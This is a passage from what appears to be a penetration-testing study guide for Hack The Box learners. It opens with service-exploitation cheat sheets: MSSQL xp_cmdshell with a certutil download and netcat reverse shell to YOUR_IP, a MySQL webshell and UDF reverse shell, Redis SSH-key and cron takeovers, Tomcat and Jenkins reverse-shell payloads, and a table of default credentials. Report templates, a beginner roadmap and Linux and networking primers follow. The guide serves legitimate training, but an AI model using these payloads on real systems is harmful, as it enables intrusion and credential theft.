EXECUTE sp_configure 'xp_cmdshell', 1; RECONFIGURE;

EXEC xp_cmdshell 'whoami';

# Get a shell — certutil download + execute

EXEC xp_cmdshell 'certutil -urlcache -split -f http://YOUR_IP:8080/nc.exe C:\Windows\Temp\nc.exe';

EXEC xp_cmdshell 'C:\Windows\Temp\nc.exe YOUR_IP 4444 -e cmd.exe';

# Read files via BULK INSERT

CREATE TABLE t(line VARCHAR(8000)); BULK INSERT t FROM 'C:\Windows\win.ini'; SELECT * FROM t;

# Linked server abuse (lateral movement)

SELECT * FROM sys.servers;  # find linked servers

EXEC ('xp_cmdshell ''whoami''') AT [LINKED_SERVER_NAME];

# Steal Net-NTLMv2 via xp_dirtree (capture with Responder)

EXEC xp_dirtree '\\YOUR_IP\share', 1, 1;

MySQL — Enumeration to RCE

# Connect

mysql -h 10.10.10.X -u root -p

mysql -h 10.10.10.X -u root --password=''  # blank password

# Enumerate

show databases; use mysql; show tables; select user,password from user;

# Read local files (requires FILE privilege)

SELECT LOAD_FILE('/etc/passwd');

SELECT LOAD_FILE('/var/www/html/config.php');

# Write files → webshell (if web root is writable)

SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php';

# UDF (User Defined Function) for RCE — requires INSERT+FILE priv

show variables like 'plugin_dir';  # find plugin dir

# Upload raptor_udf2.so to plugin dir, then:

CREATE FUNCTION sys_exec RETURNS INT SONAME 'raptor_udf2.so';

SELECT sys_exec('bash -c "bash -i >& /dev/tcp/YOUR_IP/4444 0>&1"');

Redis — Unauthenticated to RCE

Redis is a key-value store running on port 6379. Unauthenticated instances are extremely common on HTB and allow arbitrary file writes — leading to SSH key injection or cron-based RCE.

# Basic connectivity check

redis-cli -h 10.10.10.X ping  # should return PONG

redis-cli -h 10.10.10.X info server

redis-cli -h 10.10.10.X keys '*'  # dump all keys

redis-cli -h 10.10.10.X get keyname

# Auth bypass / crack password

redis-cli -h 10.10.10.X auth PASSWORD

hydra -P rockyou.txt redis://10.10.10.X

# RCE Method 1 — Write SSH authorized_keys

ssh-keygen -t rsa -f redis_key -N ""

(echo -e "\n\n"; cat redis_key.pub; echo -e "\n\n") > redis_pub.txt

redis-cli -h 10.10.10.X flushall

cat redis_pub.txt | redis-cli -h 10.10.10.X -x set pwn

redis-cli -h 10.10.10.X config set dir /root/.ssh

redis-cli -h 10.10.10.X config set dbfilename authorized_keys

redis-cli -h 10.10.10.X save

ssh -i redis_key root@10.10.10.X

# RCE Method 2 — Write cron job (Redis running as root)

redis-cli -h 10.10.10.X set cron "\n\n*/1 * * * * root bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'\n\n"

redis-cli -h 10.10.10.X config set dir /etc/cron.d

redis-cli -h 10.10.10.X config set dbfilename root_cron

redis-cli -h 10.10.10.X save

MongoDB — Unauthenticated Enum

# Connect (no auth)

mongo --host 10.10.10.X

mongosh 10.10.10.X

# Enumerate

show dbs

use admin; show collections

db.users.find().pretty()

db.getCollectionNames().forEach(c => { print(c); db[c].find().forEach(printjson) })

# From Linux without mongo client

curl -s http://10.10.10.X:27017/

SMTP User Enumeration & Exploitation

# Banner grab and version check

nc -nv 10.10.10.X 25

nmap -p 25 --script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344 10.10.10.X

# User enumeration via VRFY

smtp-user-enum -M VRFY -U /usr/share/seclists/Usernames/top-usernames-shortlist.txt -t 10.10.10.X

# Manual VRFY:

telnet 10.10.10.X 25

EHLO test

VRFY root

VRFY admin

# User enum via RCPT TO (often less restricted)

MAIL FROM: test@test.com

RCPT TO: root@localhost  # 250 = user exists, 550 = doesn't

# Send mail with attachment (phishing pivot)

sendEmail -t target@domain.htb -f attacker@evil.com -s 10.10.10.X -u "Subject" -m "Body" -a malicious.doc

# SwaksExploit (SMTP CVEs, open relay)

swaks --to admin@domain.htb --from evil@evil.com --server 10.10.10.X --body 'http://YOUR_IP/x'

POP3 / IMAP — Reading Emails

# POP3 manual session

telnet 10.10.10.X 110

USER username

PASS password

LIST          # list messages

RETR 1        # read message 1

# IMAP (search mailboxes)

curl -u user:pass imap://10.10.10.X/INBOX

curl -u user:pass imap://10.10.10.X/INBOX;UID=1

SNMP — Information Goldmine

SNMP on UDP 161 leaks massive amounts of system info — running processes (with command-line args containing passwords!), installed software, network interfaces, user accounts.

# Brute-force community strings

onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 10.10.10.X

# Full walk — dump everything

snmpwalk -c public -v2c 10.10.10.X

snmpwalk -c public -v2c 10.10.10.X | tee snmp-full.txt

# Targeted OID queries

snmpwalk -c public -v1 10.10.10.X 1.3.6.1.2.1.25.4.2.1.2  # running processes

snmpwalk -c public -v1 10.10.10.X 1.3.6.1.2.1.25.6.3.1.2  # installed software

snmpwalk -c public -v1 10.10.10.X 1.3.6.1.4.1.77.1.2.25   # Windows users

snmpwalk -c public -v1 10.10.10.X 1.3.6.1.2.1.6.13.1.3    # open TCP ports

# Better output with snmp-check

snmp-check 10.10.10.X -c public

NFS — Mount and Exploit

# Enumerate exports

showmount -e 10.10.10.X

nmap --script nfs-showmount 10.10.10.X

# Mount share

mkdir /mnt/nfs && mount -t nfs 10.10.10.X:/share /mnt/nfs -o nolock

ls -la /mnt/nfs

# no_root_squash exploit — create SUID binary from your machine as root

cp /bin/bash /mnt/nfs/rootbash

chmod +s /mnt/nfs/rootbash

# On target machine:

/share/rootbash -p  # -p preserves SUID effective UID

# If UID mismatch (files owned by UID 1001 but you're 1000)

sudo useradd -u 1001 nfsuser && sudo su nfsuser  # match UID to access files

Apache Tomcat — Manager Deploy → Shell

# Default credentials to try on /manager/html

admin:admin  tomcat:tomcat  admin:tomcat  tomcat:s3cret  admin:s3cret  manager:manager

# Brute force manager login

hydra -L users.txt -P pass.txt http-get://10.10.10.X/manager/html -s 8080

# Generate malicious WAR and deploy

msfvenom -p java/jsp_shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 -f war -o shell.war

# Upload via GUI: Manager → WAR file to deploy → Browse → Deploy

# OR via curl:

curl -u 'tomcat:s3cret' -T shell.war http://10.10.10.X:8080/manager/text/deploy?path=/shell

curl http://10.10.10.X:8080/shell/  # trigger reverse shell

Jenkins — Script Console → RCE

# Default creds + check for unauthenticated access
curl -s http://10.10.10.X:8080/ # check if login required
admin:admin admin:password jenkins:jenkins

# Navigate to: Manage Jenkins → Script Console
# Execute Groovy for Linux RCE:
def cmd = "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9ZT1VSX0lQLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}".execute()
println cmd.text

# Windows RCE via Script Console:
def cmd = "cmd.exe /c whoami".execute()
println(cmd.text)

# Extract credentials from Jenkins config files
find /var/lib/jenkins -name "credentials.xml" -o -name "*.xml" 2>/dev/null | xargs grep -l "password\|secret"
# Decrypt Jenkins secrets with hudson.util.Secret.fromString()

Other Web Applications Quick Reference

App	Default Path	Default Creds	Attack Vector
phpMyAdmin	/phpmyadmin	root:blank, root:root	SQL → OUTFILE webshell
Webmin	:10000	root:root	CVE-2019-15107 RCE (unauth)
Splunk	:8000	admin:changeme	Custom app → shell upload
Kibana	:5601	elastic:changeme	CVE-2019-7609 prototype pollution
Grafana	:3000	admin:admin	CVE-2021-43798 path traversal
GitLab	:80	root:5iveL!fe	SSRF, RCE CVE-2021-22205
WordPress	/wp-admin	admin:admin	wpscan, theme/plugin RCE
Drupal	/admin	admin:admin	Drupalgeddon2 CVE-2018-7600
IIS	:80/:443	—	WebDAV, PUT method, ShortName
Werkzeug	/console	PIN required	PIN calculation exploit

▸Reporting & Documentation

// writing up your findings — essential for OSCP, certifications, and real engagements

▸

A machine you can't explain is a machine you haven't learned from. Writing notes and reports turns random successes into repeatable skills. This section gives you templates for every level — from quick HTB notes to full pentest reports.

HTB Machine Write-Up Template

01Machine Summary BlockALWAYS WRITE›

# MachineName — [Easy/Medium/Hard] [Linux/Windows] IP: 10.10.10.X | Date: YYYY-MM-DD | Time: ~Xh ## Kill Chain [Service/Port] → [Vulnerability] → [Foothold] → [PrivEsc vector] → [Root] ## Flags user.txt : [hash] root.txt : [hash] ## Key Credentials Found - [user]:[pass] — found in [location] - [user]:[hash] — cracked to [plaintext] ## Ports / Services 22/tcp SSH OpenSSH 8.2 80/tcp HTTP Apache 2.4.41 ... ## Lessons Learned - What I missed initially: - What worked immediately: - Technique I want to practice more:

02Enumeration NotesDURING BOX›

## Enumeration ### Nmap [paste trimmed nmap output here] ### Web - Tech stack: [Apache/Nginx/IIS] + [PHP/Python/ASP] - CMS: [WordPress/Drupal/None] - Interesting endpoints: - /admin — [what's here] - /backup — [what's here] - VHosts found: [dev.machine.htb, etc] ### Other Services - SMB: shares found: [list], users found: [list] - FTP: anonymous access [yes/no], interesting files: [list] ### Credentials Found | User | Password/Hash | Source | |------|--------------|--------| | | | | ### Dead Ends (Rabbit Holes) - Tried X for Y minutes → not the path because Z

03Vulnerability Write-Up (OSCP Style)FOR CERTS›

## Vulnerability: [NAME] (CVE-XXXX-XXXXX) **Severity:** Critical / High / Medium / Low **CVSS Score:** X.X **Affected Component:** [service/version] **CWE:** CWE-XX [Improper Input Validation / etc] ### Description [2-3 sentences explaining the vulnerability in plain language] ### Proof of Concept 1. Navigated to http://10.10.10.X/vulnerable-endpoint 2. Sent the following payload: [payload here] 3. Received reverse shell as [user] ### Evidence [Screenshot description or command output] user.txt: [hash] ### Remediation - Update [software] to version X.X or later - Apply vendor patch [link] - [Additional mitigations]

04Note-Taking Tools ComparisonSETUP›

Tool	Best For	Platform	Sync
Obsidian	Linked notes, graph view, templates	Desktop	Local/iCloud/Git
CherryTree	Hierarchical notes, rich text + code	Desktop	Local .ctb file
Notion	Collaborative, databases, templates	Web/Desktop	Cloud
Joplin	Open-source, Markdown, E2E encrypted	Desktop/Mobile	Self-hosted/Cloud
Logsec	Daily logs, outliner, linked references	Desktop/Web	Local/Git
Plain text + tmux	Speed, no friction, always available	Terminal	Git

Recommended: Use Obsidian with a pentesting vault template. Keep one note per machine, link techniques to a reference vault, and tag by vulnerability type. After 20+ boxes you'll have a searchable personal knowledge base worth more than any guide.

Folder Structure Template

# Create this for every machine before you start

export MACHINE=MachineName IP=10.10.10.X

mkdir -p ~/htb/$MACHINE/{nmap,web,exploits,loot,creds,screenshots,report}

cat > ~/htb/$MACHINE/notes.md <<EOF

# $MACHINE — 10.10.10.X

Date: $(date +%Y-%m-%d)

## Open Ports

## Creds Found

## Kill Chain

## Lessons

EOF

cd ~/htb/$MACHINE && echo "Ready to hack $MACHINE at $IP"

Screenshot Evidence — What to Capture

1

Proof of Exploitation

Always capture whoami + hostname + ip a + the flag in a single terminal window. For OSCP, include the date with date && whoami && hostname && cat proof.txt.

2

Vulnerability Evidence

Screenshot the vulnerable request in Burp Suite, the exploit running, or the error message that revealed the vulnerability. Annotate what's important.

3

Enumeration Findings

Capture nmap output, interesting directory listings, credential files found. These tell the story of how you found the path.

4

Dead Ends Matter Too

Screenshot rabbit holes with timestamps. In a real engagement, documenting what you tested and ruled out is as important as what you found.

▸Start Here — Zero to Hero Roadmap

// your structured path from complete beginner to solving HTB machines solo

★

If you've never hacked anything before, start with this tab. Follow the weekly plan in order. Don't skip ahead — each week builds on the last. Everyone who is good at this was once exactly where you are now.

What You'll Be Able to Do

🗓

After 2 Weeks

Navigate Linux confidently, understand basic networking, set up your hacking environment, and complete guided HTB labs.

🗓

After 6 Weeks

Solve Easy HTB machines independently, exploit common web vulnerabilities, perform privilege escalation on Linux and Windows.

🗓

After 3 Months

Tackle Medium machines, understand Active Directory attacks, work through CTF challenges across multiple categories.

🗓

After 6 Months

Attempt Hard machines, contribute to team CTFs, pursue OSCP or HTB CPTS certification with a real chance of passing.

Your Week-by-Week Learning Plan

WEEK 1 — FOUNDATION

Linux & Networking

Linux CLI basics (navigation, files, permissions)
Networking fundamentals (IP, ports, DNS, HTTP)
Set up Kali Linux VM
Connect to HTB VPN

⏱ ~10 hrs · Click to open Linux tab

WEEK 2 — FIRST STEPS

CTF 101 & First Flags

What CTFs are and how scoring works
HTB Academy "Getting Started" module
Complete 3 guided HTB Academy labs
Solve OverTheWire Bandit levels 0–10

⏱ ~12 hrs · Click to open CTF 101 tab

WEEK 3 — METHODOLOGY

Recon & Enumeration

Nmap scanning methodology
Web directory brute-forcing
First Easy retired machine (Lame or Jerry)
Read an IppSec walkthrough in full

⏱ ~15 hrs · Click to open Methodology tab

WEEK 4 — WEB ATTACKS

Web Vulnerabilities

SQLi, LFI, file upload bypass
PortSwigger SQLi labs (free)
Solve Nibbles or Shocker on HTB
Learn Burp Suite basics

⏱ ~15 hrs · Click to open Web Attacks tab

WEEK 5 — PRIVILEGE ESC

Linux & Windows PrivEsc

TryHackMe Linux PrivEsc room
TryHackMe Windows PrivEsc room
sudo -l, SUID, cronjob techniques
Solve Bashed on HTB

⏱ ~15 hrs · Click to open PrivEsc tab

WEEK 6 — SOLO HACKING

Active Machines — Solo

Attempt 2 active Easy machines without hints
Write up your kill chain after each
Start a personal notes vault
Join HTB Discord community

⏱ ~20 hrs · Click to open Mindset tab

Environment Setup Checklist

✓
Download and install VirtualBox or VMware (free)
✓
Download Kali Linux VM image from kali.org/get-kali (pre-built VM)
✓
Give the VM at least 4GB RAM and 40GB disk
✓
Create a free account at hackthebox.com
✓
Download your HTB VPN pack from Settings → VPN
✓
Connect with sudo openvpn your_pack.ovpn — confirm ip a show tun0 shows an IP
✓
Install SecLists: sudo apt install seclists -y
✓
Install pwncat-cs: pip install pwncat-cs
✓
Set up a notes app — Obsidian or CherryTree recommended
✓
Bookmark: gtfobins.github.io, book.hacktricks.xyz, revshells.com

Common Beginner Mistakes — Avoid These

✗ Only scanning common ports

✓ Always scan all 65535 ports

Services on unusual ports (like 8080, 8443, 4444) are missed constantly. The answer is often on a high port.

✗ Not adding hostname to /etc/hosts

✓ Add IP + hostname immediately

Many boxes use virtual hosting. Without the hostname in /etc/hosts, you'll get a different (default) page and miss the actual attack surface.

✗ Working with a dumb shell

✓ Upgrade to full TTY immediately

Dumb shells break on tab-complete, Ctrl+C kills your shell, and many tools won't run. Always upgrade first thing.

✗ Skipping UDP scanning

✓ Run UDP top-100 in background

SNMP (161), TFTP (69), and DNS (53) run on UDP. These are missed by default TCP scans and often contain the foothold.

✗ Using Metasploit for everything

✓ Learn manual exploitation first

Metasploit hides what's actually happening. Manual exploits teach you the vulnerability. OSCP limits Metasploit to one use.

✗ Asking for hints immediately

✓ Struggle productively for 30 min

The frustration of being stuck is where learning happens. Hints before genuine effort produce nothing. Timer in the Mindset tab helps.

✗ Not taking notes

✓ Document everything as you go

You will forget the credential you found 2 hours ago. You will forget what ports are open. Notes aren't optional — they're the job.

✗ Running linPEAS and ignoring output

✓ Read the highlighted sections carefully

LinPEAS output is colour-coded by severity. Beginners run it and feel overwhelmed. Focus on red/yellow items first — those are your leads.

✗ Giving up after 1 hour

✓ Take a break, come back fresh

Your brain solves problems in the background. Step away, sleep on it, and you'll often see the answer immediately when you return.

▸Linux Fundamentals

// everything you need to be fluent at the command line before you start hacking

★ BEGINNER TRACK — START HERE

💡

The fastest way to learn Linux is to use it daily. Set Kali as your default terminal environment. Every time you want to do something, try to do it from the command line first. Fluency comes from repetition, not memorisation.

Filesystem Navigation

Command	What it does	Example
pwd	Print current directory (where you are)	/home/kali/htb
ls	List files in current directory	ls -la (show hidden + permissions)
cd /path	Change directory	cd .. (go up one level)
mkdir name	Create a new directory	mkdir -p htb/machine/nmap
cp src dst	Copy a file	cp shell.php /var/www/html/
mv src dst	Move or rename a file	mv old.txt new.txt
rm file	Delete a file (rm -rf for directories)	rm -rf /tmp/oldstuff
find / -name x	Search for files by name	find / -name "*.conf" 2>/dev/null
cat file	Print file contents	cat /etc/passwd
less file	Read long files page by page (q to quit)	less /var/log/auth.log
grep "text" file	Search for text in a file	grep -r "password" /var/www/
head / tail	Show first/last lines of file	tail -f /var/log/syslog

Key Directories to Know

/etc/passwd      → all user accounts (no passwords here in modern Linux)

/etc/shadow      → hashed passwords (root-only readable)

/etc/hosts       → local DNS — add "IP hostname" entries here

/var/www/html/   → default Apache web root — where web files live

/tmp/            → world-writable temp dir — safe to upload tools here

/home/user/      → user's home directory — check for .ssh, .bash_history

/root/           → root's home — root.txt flag lives here on HTB

/opt/            → optional/third-party software — often contains custom apps

/proc/           → virtual filesystem — process info, env vars, open files

File Permissions Explained

Every file has three permission sets: owner, group, others. Each set has read (r=4), write (w=2), execute (x=1).

-rwxr-xr-- 1 root sudo 8192 filePermission string — read carefully

-File type: - = file, d = directory, l = symlink

rwxOwner (root) can: Read + Write + Execute

r-xGroup (sudo) can: Read + Execute (no write)

r--Others can: Read only

# Change permissions

chmod 755 script.sh   # rwxr-xr-x (7=rwx, 5=r-x, 5=r-x)

chmod +x script.sh    # add execute permission for everyone

chmod 600 id_rsa      # rw------- (SSH keys MUST be this)

# Change owner

chown user:group file

chown -R www-data /var/www/html  # recursive

# SUID bit (runs as owner regardless of who executes)

chmod +s binary      # sets SUID — shows as 's' in ls -la

find / -perm -4000 2>/dev/null  # find ALL SUID files — key privesc check

Reading / Writing Files

# Redirect output to file

echo "text" > file.txt      # overwrite

echo "more" >> file.txt     # append

command > output.txt 2>&1   # redirect stdout AND stderr

command 2>/dev/null         # silence error messages

# Pipe — pass output of one command to another

cat /etc/passwd | grep "/bin/bash"   # find login shells

ps aux | grep root                   # find root processes

ls -la | sort -k5 -n                # sort by file size

Users, Groups & Processes

# Current user info

whoami              # your username

id                  # uid, gid, and ALL group memberships — critical for privesc

groups              # your groups (docker, lxd, sudo = very interesting)

# Switch users

su - username       # switch to user (prompts for password)

sudo command        # run command as root

sudo -l             # ALWAYS run this — shows what you can run as root

sudo su -           # become root if you have full sudo

# Processes

ps aux             # all running processes with user and command

ps aux | grep root # what is root running?

top                # live process viewer (q to quit)

kill -9 PID        # force-kill a process by its PID number

# Environment variables

env                # print all environment variables — can reveal paths, tokens

echo $PATH         # directories searched for commands — PATH hijacking target

export VAR=value   # set an environment variable for current session

Package Management

sudo apt update && sudo apt install toolname -y   # install a tool

sudo apt upgrade -y   # update everything (run weekly)

which toolname        # find where a binary lives

pip install package --break-system-packages   # Python packages

Network Commands

# See your network interfaces and IPs

ip a               # show all interfaces — look for tun0 (HTB VPN)

ip r               # routing table — how traffic is directed

ifconfig           # older alternative to ip a

# Test connectivity

ping -c 4 10.10.10.X  # send 4 pings — confirms host is reachable

traceroute 10.10.10.X # show path packets take

# DNS lookup

nslookup machine.htb  # resolve hostname to IP

dig machine.htb       # detailed DNS query

# Open connections

ss -tlnp           # show all listening TCP ports (what's running locally)

netstat -tulnp     # alternative (may need net-tools)

# Download files

wget http://URL -O output   # download to file

curl -s http://URL          # fetch and print to terminal

curl -o file http://URL     # download to file

Bash Scripting Basics

You don't need to be a programmer. You need to know enough bash to automate repetitive tasks and understand scripts you find on targets.

#!/bin/bash # always start scripts with this (shebang)

# Variables
NAME="target"
IP="10.10.10.X"
echo "Scanning $NAME at $IP"

# If / else
if [ -f "/tmp/shell.php" ]; then
echo "Shell exists"
else
echo "Shell not found"
fi

# For loop — e.g. ping sweep
for i in $(seq 1 254); do
ping -c1 -W1 192.168.1.$i &>/dev/null && echo "192.168.1.$i UP"
done

# While loop — read file line by line
while IFS= read -r line; do
echo "Trying: $line"
done < wordlist.txt

# Run a script
chmod +x script.sh && ./script.sh

Useful One-Liners

# Search for string in all files recursively

grep -r "password" /var/www/ 2>/dev/null

# Find recently modified files

find / -type f -mmin -10 2>/dev/null | grep -v /proc

# Extract IPs from a file

grep -Eo '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' file.txt

# Sort + deduplicate a list

cat list.txt | sort -u

# Count lines in a file

wc -l file.txt

# Run previous command as sudo

sudo !!

Test Your Linux Knowledge

▸Networking Fundamentals

// understanding networks is what makes nmap output meaningful

★ BEGINNER TRACK

How Networks Work — The Mental Model

Your Browser

→

DNS lookup: "what IP is google.com?"

DNS Server

→

replies: "142.250.x.x"

Your Browser

→

TCP connection to 142.250.x.x on port 443

Google Server

→

sends back HTML/CSS/JS over HTTPS

IP ADDRESSES

# IPv4 — 4 numbers, 0-255 each

192.168.1.100   ← private (LAN)

10.10.10.50     ← HTB machine IP

10.10.14.5      ← your tun0 (VPN) IP

127.0.0.1       ← localhost (yourself)

# Subnets — which IPs are "local"

10.10.10.0/24   ← 10.10.10.1 to 10.10.10.254

/24 = 254 hosts, /16 = 65534 hosts

TCP vs UDP

TCP — reliable, ordered, confirmed

→ HTTP, SSH, FTP, SMTP, SMB

→ Three-way handshake (SYN/SYN-ACK/ACK)

→ nmap -sT or -sS (SYN scan)

UDP — fast, no confirmation, fire-forget

→ DNS (53), SNMP (161), DHCP (67/68)

→ nmap -sU (slow, often worth it)

Key insight: TCP open = service responding.
UDP open = might be open (no reply needed).

Understanding Ports

A port is like a door number on a building. The IP address is the building; the port is which room you're knocking on. Every network service listens on a specific port number. Knowing which service runs on which port is fundamental to hacking.

# Port ranges

1–1023      Well-known ports (root required to bind these)

1024–49151  Registered ports (applications)

49152–65535 Dynamic/ephemeral ports (temporary connections)

# What "open port" actually means

A process on the target is actively listening on that port

→ something is running there → something to attack

# Nmap port states

open      Service is listening — investigate

closed    Port reachable but nothing listening

filtered  Firewall blocking — can't determine state

How HTTP Works — Critical for Web Hacking

Most HTB machines have a web server. Understanding HTTP requests and responses is essential for web attacks, Burp Suite, and understanding what you're actually sending.

// HTTP REQUEST (browser → server)

GET /login.php HTTP/1.1Method + path + version

Host: 10.10.10.XWhich server (virtual hosting)

User-Agent: Mozilla/5.0Browser identifier (can be spoofed)

Cookie: session=abc123Session token — steal this = steal session

Content-Type: application/jsonFormat of POST body data

// HTTP RESPONSE (server → browser)

HTTP/1.1 200 OKStatus code — memorise these

200 OKSuccess

301/302 RedirectMoved — follow the redirect

403 ForbiddenExists but blocked — worth probing further

404 Not FoundDoesn't exist (or hidden)

500 Server ErrorCrash — often reveals framework/version info

Server: Apache/2.4.49Version disclosure — searchsploit this!

# Make HTTP requests from terminal

curl -v http://10.10.10.X               # verbose — shows headers

curl -I http://10.10.10.X               # headers only

curl -X POST -d "user=admin&pass=test" http://10.10.10.X/login

curl -b "cookie=value" http://10.10.10.X # send cookie

curl -H "X-Custom-Header: value" http://10.10.10.X

Reading Nmap Output — Annotated

Nmap output can look overwhelming at first. Here's exactly what every part means and what action it should trigger in your mind.

Nmap scan report for 10.10.10.XTarget IP (add hostname to /etc/hosts if found)

22/tcp open sshPort 22, TCP, SSH running → try creds, check version for CVEs

OpenSSH 7.2p2 UbuntuExact version → searchsploit "OpenSSH 7.2"

80/tcp open httpWeb server → gobuster + whatweb + browser immediately

Apache httpd 2.4.18Version → check for known vulns

|_http-title: Login PagePage title → there's a login here, try default creds

445/tcp open microsoft-dsSMB → enum4linux + smbclient + check for EternalBlue

Host script results:Script output below — read carefully

smb-vuln-ms17-010: VULNERABLEEternalBlue confirmed vulnerable → exploit immediately

💡

The golden question for every open port: "What service is running here, what version is it, are there known exploits, and do I have valid credentials?" Answer all four and you'll find your way in.

▸Glossary — Hacking Terms Explained

// every term you'll encounter, explained in plain language

★ BEGINNER TRACK

ENUMERATION

Systematically gathering information about a target — ports, services, users, directories. The foundation of all hacking. If you're stuck, enumerate more.

FOOTHOLD

Your initial access to a machine — usually a low-privilege shell as a regular user. The starting point for privilege escalation.

e.g. "I got a foothold as www-data via an LFI exploit"

PRIVILEGE ESCALATION (PRIVESC)

Going from a low-privilege account (www-data, user) to a high-privilege account (root, SYSTEM/Administrator).

LATERAL MOVEMENT

Moving from one compromised machine to another within the same network, using credentials or trust relationships discovered during exploitation.

PERSISTENCE

Maintaining access to a machine after a reboot or session timeout — installing backdoors, SSH keys, scheduled tasks, or registry entries.

CVE

Common Vulnerabilities and Exposures — a standardised ID for known security flaws. CVE-2021-4034 = PwnKit. Always searchsploit the CVE number.

searchsploit CVE-2021-4034

EXPLOIT

Code or technique that takes advantage of a vulnerability to achieve an unintended effect — usually gaining access or running commands.

PAYLOAD

The part of an exploit that does something useful once the vulnerability is triggered — typically a reverse shell, a command, or shellcode.

PIVOT

Using a compromised machine as a jumping-off point to reach other machines on internal networks not directly accessible from your attacking machine.

RABBIT HOLE

A path that looks promising but leads nowhere. A sign you're in one: you've spent more than 20 minutes on the same dead-end approach. Pivot — look elsewhere.

KILL CHAIN

The sequence of steps that led from initial access to owning the machine. Writing it out after each box consolidates learning enormously.

e.g. Port 80 → SQLi → RCE → www-data → SUID python → root

LOOT

Credentials, hashes, flags, private keys, or sensitive files found on a compromised machine. Save everything — loot from one machine often unlocks another.

RCE — Remote Code Execution

The ability to run arbitrary commands on a target server. The highest-impact web vulnerability. Usually leads directly to a reverse shell.

SQLi — SQL Injection

Injecting SQL syntax into inputs to manipulate database queries. Can dump the entire database, bypass authentication, or (sometimes) execute OS commands.

Input: ' OR '1'='1 → bypasses login

LFI — Local File Inclusion

A vulnerability that lets you read local files on the server by manipulating a file path parameter.

?file=../../../../etc/passwd

RFI — Remote File Inclusion

Like LFI but includes a remote URL — your malicious script gets executed on the server. Rarer in modern apps.

XSS — Cross-Site Scripting

Injecting JavaScript into a page that other users see — steals their cookies/sessions. Important for web CTF but less common on HTB machines.

SSRF — Server-Side Request Forgery

Forcing the server to make HTTP requests on your behalf — to internal services, cloud metadata endpoints, or to read files.

IDOR — Insecure Direct Object Reference

Accessing resources you shouldn't by changing an ID in the request. ?user_id=1 → change to ?user_id=2 to see another user's data.

DIRECTORY TRAVERSAL

Using ../ sequences to escape a directory and access files outside the intended web root. Related to LFI.

VIRTUAL HOST (VHOST)

Multiple websites served from one IP using different hostnames. dev.machine.htb and machine.htb may be completely different apps on the same IP.

CMS

Content Management System — WordPress, Drupal, Joomla. Each has known exploits. Identify with whatweb and scan with wpscan/droopescan.

REVERSE SHELL

The target connects back TO you. You listen with netcat, target runs the payload, you get a shell. The standard method when you can execute code on a target.

nc -lvnp 4444 → bash -i >& /dev/tcp/YOUR_IP/4444 0>&1

BIND SHELL

The target opens a port and listens. You connect to it. Used when the target can't reach you (firewall blocks outbound). Less common than reverse shells.

WEBSHELL

A PHP/ASPX/JSP file uploaded to a web server that executes OS commands via HTTP requests. Simple but detectable.

<?php system($_GET["cmd"]); ?>

TTY / PTY

A proper interactive terminal. Without upgrading to a full TTY, your shell breaks on Ctrl+C, tab-complete doesn't work, and some tools fail. Always upgrade immediately.

SUID

Set User ID — a permission bit that makes a binary run as its owner (usually root) regardless of who executes it. A common Linux privilege escalation path.

find / -perm -4000 2>/dev/null

HASH / NTLM HASH

A one-way transformation of a password. NTLM hashes are used by Windows. You can crack them offline (hashcat) or use them directly (pass-the-hash) without cracking.

PASS THE HASH (PTH)

Using an NTLM hash directly to authenticate without knowing the plaintext password. Works against Windows SMB, WinRM, RDP.

METERPRETER

An advanced Metasploit payload — lives in memory, encrypted, has built-in commands for file transfer, pivoting, screenshot, keylogging. More capable than a plain shell.

ACTIVE DIRECTORY (AD)

Microsoft's directory service for managing users, computers, and policies in corporate networks. Understanding AD is the most valuable skill for real-world pentesting.

DOMAIN CONTROLLER (DC)

The server that runs Active Directory. Owns all the credentials for the domain. Compromising the DC = owning the entire network. The ultimate target.

KERBEROS

The authentication protocol used by Active Directory. Involves ticket-granting tickets (TGTs) and service tickets. Kerberoasting and ASREPRoasting exploit weaknesses in it.

SMB

Server Message Block — Windows file-sharing protocol on port 445. Source of many famous vulnerabilities (EternalBlue). Can be accessed with smbclient.

WINRM

Windows Remote Management on port 5985/5986. Like SSH for Windows. If you have credentials and the user is in the Remote Management Users group, evil-winrm gives you a shell.

SAM DATABASE

Security Account Manager — stores local Windows password hashes. Can be dumped with impacket-secretsdump. Yields NTLM hashes for all local users.

LSASS

Local Security Authority Subsystem Service — Windows process that handles authentication and stores credentials in memory. Mimikatz dumps credentials from LSASS.

SeImpersonatePrivilege

A Windows token privilege that allows impersonating other users. Service accounts often have it. Combined with Potato exploits → instant SYSTEM shell.

▸CTF 101 — Competitions & First Flags

// what ctfs are, how they work, and how to get your first flag

★ BEGINNER TRACK

WHAT IS A CTF?

Capture The Flag is a competitive cybersecurity challenge. You solve puzzles and hack intentionally vulnerable systems to find hidden "flags" — strings like HTB{s0m3_r4nd0m_h4sh} — and submit them for points.

HTB machines give two flags per box: user.txt (low-priv access) and root.txt (full control). CTF competitions add more categories.

HTB vs CTF COMPETITIONS

HTB Machines — real-world attack simulation. Enumerate a network service, exploit it, escalate. The skills transfer directly to real pentesting.

CTF Competitions (PicoCTF, CTFtime.org) — puzzle-based. Include crypto, reverse engineering, forensics, and web challenges. Often more creative and less "realistic" than HTB.

CTF Challenge Categories

🌐

WEB

Most common on HTB

SQLi, LFI, SSRF, XSS, command injection
Tools: Burp Suite, sqlmap, ffuf

🔐

CRYPTOGRAPHY

Common in CTF comps

Break ciphers, weak keys, encoding
Tools: CyberChef, Python, RsaCtfTool

🔍

FORENSICS

Common in CTF comps

File analysis, memory dumps, pcap
Tools: Wireshark, Autopsy, Volatility

🖼️

STEGANOGRAPHY

Common in CTF comps

Data hidden in images/audio
Tools: steghide, binwalk, stegseek

⚙️

REVERSE ENGINEERING

Advanced

Analyse compiled binaries
Tools: Ghidra, IDA, strings, ltrace

💥

PWN / BINARY EXPLOIT

Advanced

Buffer overflows, heap exploits
Tools: pwntools, gdb, ROPgadget

🔓

MISCELLANEOUS

Great for beginners

Anything goes — OSINT, trivia, jail escapes
Tools: whatever the challenge needs

🏭

BOOT2ROOT (HTB style)

The HTB machine format

Full attack chain on a vulnerable VM
Tools: nmap, burp, metasploit, linpeas

Your First HTB Flag — Step by Step

1
